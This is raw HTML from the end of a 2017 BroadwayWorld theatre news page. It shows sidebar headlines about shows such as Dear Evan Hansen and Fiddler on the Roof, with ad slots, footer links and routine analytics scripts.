<a href="/article/AUDIO-Listen-to-the-Never-Before-Heard-Track-In-the-Bedroom-Down-the-Hall-from-DEAR-EVAN-HANSEN-Out-Today-20171117">
<img src="https://images.bwwstatic.com/columnpic10/170ECB914EE-099E-24C2-D6233BC5F0540BEB.jpg" alt="Listen to a Never-Before-Heard Track from DEAR EVAN HANSEN" width=180 height=74>
</a>
</div>
<div class=item-content style="height:60px;">
<h4><a href="/article/AUDIO-Listen-to-the-Never-Before-Heard-Track-In-the-Bedroom-Down-the-Hall-from-DEAR-EVAN-HANSEN-Out-Today-20171117">Listen to a Never-Before-Heard Track from DEAR EVAN HANSEN</a></h4>
</div>
</div>
</div>
<!-- END .widget -->
</div>
<center>
<!-- BEGIN .widget -->
<div class=widget style="border-bottom:0px;margin-bottom:0px;">
<center>
<div class=do-space>
<center>
<!-- sortable new300B  size:300x250 -->
<div id=div-gpt-ad-1479672818651-1 style='width:300px;overflow:hidden;position:relative;padding-top:6px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-1');});</script>
</div>
</div>
<!-- END .widget -->
</div>
<!-- BEGIN .widget -->
<div class=widget style="border-bottom:0px;margin-bottom:8px;">
<h3>Subscribe Now</h3>
<div class=widget-subscribe>
<div>
<p>Register now for discounts, specials & more!</p>
</div>
<form action="/register.cfm" method=post>
<label class=label-input>
<span>E-mail address</span>
<input name=email type=email value=""/>
</label>
<input type=submit class=button value=Subscribe />
</form>
</div>
<!-- END .widget -->
</div>
<div class=widget style="border-bottom:0px;padding-bottom:4px;margin-bottom:10px;">
<center>
<div class=do-space>
<!-- sortable new300C  size:300x250 -->
<div id=div-gpt-ad-1479672818651-2 style='width:300px;overflow:hidden;position:relative;padding-top:6px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-2');});</script>
</div>
</div></center>
<!-- END .widget -->
</div>
</center>
<div class=widget style="border-bottom:0px;margin-bottom:8px;overflow: hidden;">
<h3>Recommended for You</h3>
<div id=test1>
</div>
<script>function createIframe(){var i=document.createElement("iframe");i.src="https://www2.broadwayworld.com/recommended.cfm?ModPagespeed=off";i.scrolling="no";i.frameborder="0";i.width="300px";i.height="380px";document.getElementById("test1").appendChild(i);};if(window.addEventListener)window.addEventListener("load",createIframe,false);else if(window.attachEvent)window.attachEvent("onload",createIframe);else window.onload=createIframe;</script>
<!-- END .widget -->
</div>
<div class=widget style="border-bottom:0px;margin-bottom:8px;overflow: hidden;">
<h3>Around the Broadway World</h3>
<div class=item>
<div class=item-content>
<h4><a href="https://www.broadwayworld.com/spain/article/Audiciones-para-LA-JAULA-DE-LAS-LOCAS-de-ngel-Llcer-20171115" style="font-size: 14px;font-weight: 500;"><font color=b20223><b>Spain</b></font>: Audiciones para LA JAULA DE LAS LOCAS de ?ngel Ll?cer</a></h4>
</div>
</div>
<div class=item>
<div class=item-content>
<h4><a href="https://www.broadwayworld.com/nashville/article/BWW-Review-Belmont-University-Musical-Theatres-Remarkably-Robust-FIDDLER-ON-THE-ROOF-20171112" style="font-size: 14px;font-weight: 500;"><font color=b20223><b>Nashville</b></font>: Review: BUMT's Remarkably Robust FIDDLER ON THE ROOF</a></h4>
</div>
</div>
<div class=item>
<div class=item-content>
<h4><a href="https://www.broadwayworld.com/los-angeles/article/Photo-Coverage-John-Stamos-Rory-OMalley-and-More-at-Garry-Marshall-Theatre-Founders-Gala-20171115" style="font-size: 14px;font-weight: 500;"><font color=b20223><b>Los Angeles</b></font>: Photo Coverage: John Stamos, Rory O'Malley and More at Garry Marshall Theatre Founder's Gala</a></h4>
</div>
</div>
<div class=item>
<div class=item-content>
<h4><a href="https://www.broadwayworld.com/san-diego/article/Photo-Exclusive-First-Look-at-LaChanze-Ariana-DeBose-and-Storm-Lever-in-New-Donna-Summer-Musical-at-La-Jolla-Playhouse-20171115" style="font-size: 14px;font-weight: 500;"><font color=b20223><b>San Diego</b></font>: Photo Exclusive: LaChanze, DeBose & Lever in New Donna Summer Musical</a></h4>
</div>
</div>
<div class=item>
<div class=item-content>
<h4><a href="https://www.broadwayworld.com/central-new-york/article/BWW-Interview-Chair-of-Ithaca-Colleges-Department-of-Theatre-Arts-Catherine-Weidner-20171113" style="font-size: 14px;font-weight: 500;"><font color=b20223><b>Central New York</b></font>: Interview: Chair of Ithaca College's Department of Theatre Arts Catherine Weidner</a></h4>
</div>
</div>
<div class=item>
<div class=item-content>
<h4><a href="https://www.broadwayworld.com/los-angeles/article/COME-FROM-AWAY-FALSETTOS-and-THE-PLAY-THAT-GOES-WRONG-Join-the-Ahmansons-2018-19-Lineup-20171115" style="font-size: 14px;font-weight: 500;"><font color=b20223><b>Los Angeles</b></font>: COME FROM AWAY, FALSETTOS Join the Ahmanson's 2018-19 Lineup</a></h4>
</div>
</div>
<div class=item>
<div class=item-content>
<h4><a href="https://www.broadwayworld.com/charitycorner/article/Bid-to-Be-Mike-Faists-Guest-at-Broadways-DEAR-EVAN-HANSEN-This-Weekend-20171113" style="font-size: 14px;font-weight: 500;"><font color=b20223><b>Charity Corner</b></font>: Bid to Be Mike Faist's Guest at DEAR EVAN HANSEN This Weekend</a></h4>
</div>
</div>
<div class=item>
<div class=item-content>
<h4><a href="https://www.broadwayworld.com/los-angeles/article/Photo-Flash-Lin-Manuel-Miranda-Raises-Funds-for-Puerto-Rico-at-the-Geffen-20171115" style="font-size: 14px;font-weight: 500;"><font color=b20223><b>Los Angeles</b></font>: Photos: Lin-Manuel Miranda Raises Funds for Puerto Rico at the Geffen</a></h4>
</div>
</div>
<div class=item>
<div class=item-content>
<h4><a href="https://www.broadwayworld.com/industry/article/Industry-Interview-Daryl-Roth-and-Hal-Luftigs-KINKY-BOOTS-are-Made-for-Running-20171114" style="font-size: 14px;font-weight: 500;"><font color=b20223><b>Industry</b></font>: Industry Interview: Daryl Roth and Hal Luftig's KINKY BOOTS are Made for Running</a></h4>
</div>
</div>
</div>
<div class=widget>
<div class=do-space><center>
<!-- sortable new300D  size:300x250 -->
<div id=div-gpt-ad-1479672818651-3 style='width:300px;overflow:hidden;position:relative;padding-top:6px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-3');});</script>
</div>
</center>	</div>
<!-- END .widget -->
</div>
</div>
</aside>
</div>
</div>
<!-- ENd .portus-main-content-panel -->
</div>
<!-- ENd .portus-main-content-panel -->
</div>
<!-- END .wrapper -->
</div>
<!-- BEGIN #content -->
</div>
<!-- BEGIN #footer -->
<div id=footer>
<div id=footer-widgets>
<div class=wrapper>
<div class=paragraph-row>
<div class=column12>
<!-- BEGIN .widget -->
<div class=widget>
<center>
<!-- /106293300/New728468Bottom -->
<div id=div-gpt-ad-1479672818651-New728468Bottom>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-New728468Bottom');});</script>
</div><br>
<!-- END .widget -->
</div>
</div>
<div class=paragraph-row style="margin-top: 12px;">
<div class=column3>
<div class=widget>
<h3>Follow Us</h3>
<div>
<a href="https://www.facebook.com/BroadwayWorld" target=_new><div class=short-icon-text>
<i class="fa fa-facebook"></i>
<span style="color:white;">Facebook</span>
</div></a>
<a href="https://www.twitter.com/BroadwayWorld" target=_new><div class=short-icon-text>
<i class="fa fa-twitter"></i>
<span style="color:white;">Twitter</span>
</div></a>
<a href="https://www.instagram.com/officialbroadwayworld/" target=_new>
<div class=short-icon-text>
<i class="fa fa-instagram"></i>
<span style="color:white;">Instagram</span>
</div></a>
<a href="http://broadwayworld.tumblr.com/" target=_new>
<div class=short-icon-text>
<i class="fa fa-tumblr"></i>
<span style="color:white;">Tumblr</span>
</div></a>
<a href="/article/BroadwayWorld-is-Everywhere--Interact-with-Us-With-Apps-Social-Media-Today-20151106" target=_new>
<div class=short-icon-text>
<i class="fa fa-apple"></i>
<span style="color:white;">Apps</span>
</div></a>
</div>
</div>
</div>
<div class=column3>
<div class=widget>
<h3>BWW Sister Sites</h3>
<ul class=menu>
<li><a href="/bwwtv/index.cfm">TV/MOVIES</a></li>
<li><a href="/bwwmusic/index.cfm">MUSIC</a></li>
<li><a href="/bwwbooks/index.cfm">BOOKS</a></li>
<li><a href="/bwwclassical/index.cfm">CLASSICAL MUSIC</a></li>
<li><a href="/bwwdance/index.cfm">DANCE</a></li>
<li><a href="/bwwopera/index.cfm">OPERA</a></li>
</ul>
</div>
</div>
<div class=column3 style="width: 46%">
<div class=widget>
<h3><a href="/aroundtheworld/" style="color:white;">Around the World</a></h3>
<table>
<Tr><Td style="padding-bottom: 10px;vertical-align: middle;"> <div class=item>
<a href="/spain/article/Audiciones-para-LA-JAULA-DE-LAS-LOCAS-de-ngel-Llcer-20171115" style="color:white;font-size:12pt;">
<img src="https://images.bwwstatic.com/columnpic10/x17089E5B3B3-F305-1FD7-51AED2590BEC3946.jpg.pagespeed.ic.n4pV7A6USw.jpg" alt="Audiciones para LA JAULA DE LAS LOCAS de ?ngel Ll?cer" data-ot-retina="" style="float:left;padding-right: 8px;" width=180 height=74>Audiciones para LA JAULA DE LAS LOCAS de ?ngel Ll?cer
</a>
</div></Td></Tr>
<Tr><Td style="padding-bottom: 10px;vertical-align: middle;"> <div class=item>
<a href="/birmingham/article/Regional-Roundup-Top-New-Features-This-Week-Around-Our-BroadwayWorld-1117-MARGARITAVILLE-LES-MIS-WAITRESS-and-More-20171117" style="color:white;font-size:12pt;">
<img src="https://images.bwwstatic.com/columnpic7/1704B7770BF-95C4-88EF-78F0D73C77523D3A.jpg" alt="Regional Roundup: Top New Features This Week Around Our BroadwayWorld 11/17" data-ot-retina="" style="float:left;padding-right: 8px;" width=180 height=74>Regional Roundup: Top New Features This Week Around Our BroadwayWorld 11/17
</a>
</div></Td></Tr>
</table>
</div>
</div>
</div>
</div>
</div>
<div id=footer-info>
<div class=wrapper>
<ul class=right>
<li><a href="/mediakit.cfm" style="color:white;">Advertising Info</a></li>
<li><a href="/contact.cfm" style="color:white;">Contact Us</a></li>
<li><a href="/article/Join-the-BWW-Interns-Contributors-Team-20141229" style="color:white;">Join the Team</a></li>
<li><a href="/submitnews.cfm" style="color:white;">Submit News</a></li>
<li><a href="/privacy.cfm" style="color:white;">Privacy Policy</a></li>
</ul>
<p>&copy; 2017 - Copyright <a href="https://www.wisdomdigital.com" style="color:white;"><b>Wisdom Digital Media</b></a>, all rights reserved. </p>
</div>
</div>
<!-- END #footer -->
</div>
<!-- END .boxed -->
</div>
<!-- Scripts -->
<script src="https://nav.bwwstatic.com/2017/bootstrap-3.3.7-dist/js/bootstrap.min.js" defer></script>
<script src="https://nav.bwwstatic.com/2017/theia15min.js" defer></script>
<script src="https://nav.bwwstatic.com/2017/modernizr-custom.js" defer></script>
<script src="https://nav.bwwstatic.com/2017/jsiscroll/iscroll-lite.js" defer></script>
<script src="https://nav.bwwstatic.com/2017/dat-menu-fixed.js" defer></script>
<script src="https://nav.bwwstatic.com/2017/theme-scripts1113dcompressed.js" defer></script>
<script src="https://nav.bwwstatic.com/2017/slippry/dist/slippry.min.js"></script>
<script src="https://nav.bwwstatic.com/2014/js/shadow-interstitial2017.js"></script>
<script>Shadowbox.init({skipSetup:true});</script>
<div id=div-gpt-ad-1479672818651-8 style='width:1px; height:1px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-8');});</script></div>
</div></div></div>
<!-- Begin comScore Tag -->
<script>var _comscore=_comscore||[];_comscore.push({c1:"2",c2:"18162732"});(function(){var s=document.createElement("script"),el=document.getElementsByTagName("script")[0];s.async=true;s.src=(document.location.protocol=="https:"?"https://sb":"http://b")+".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s,el);})();</script>
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=18162732&cv=2.0&cj=1"/>
</noscript>
<!-- End comScore Tag -->
<!-- Quantcast Tag -->
<script>var _qevents=_qevents||[];(function(){var elem=document.createElement('script');elem.src=(document.location.protocol=="https:"?"https://secure":"http://edge")+".quantserve.com/quant.js";elem.async=true;elem.type="text/javascript";var scpt=document.getElementsByTagName('script')[0];scpt.parentNode.insertBefore(elem,scpt);})();_qevents.push({qacct:"p-61Pu-3TC5IB0I",});</script>
<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-61Pu-3TC5IB0I.gif" border=0 height=1 width=1 alt=Quantcast />
</div>
</noscript>
<script>document.body.onload=function(){if('safari'in window&&'pushNotification'in window.safari){var permissionData=window.safari.pushNotification.permission('web.com.broadwayworld');checkRemotePermission(permissionData);}};var checkRemotePermission=function(permissionData){if(permissionData.permission==='default'){window.safari.pushNotification.requestPermission('https://secure.broadwayworld.com/push','web.com.broadwayworld',{},checkRemotePermission);}else if(permissionData.permission==='denied'){}else if(permissionData.permission==='granted'){}};</script>
<!-- End Quantcast tag -->
<!-- END body -->
</body>
<!-- END html -->
<div id=div-gpt-ad-1479672818651-Onscroll style='width:1px; height:1px;'>
<script>googletag.cmd.push(function(){googletag.display('div-gpt-ad-1479672818651-Onscroll');});</script></div>
</html>
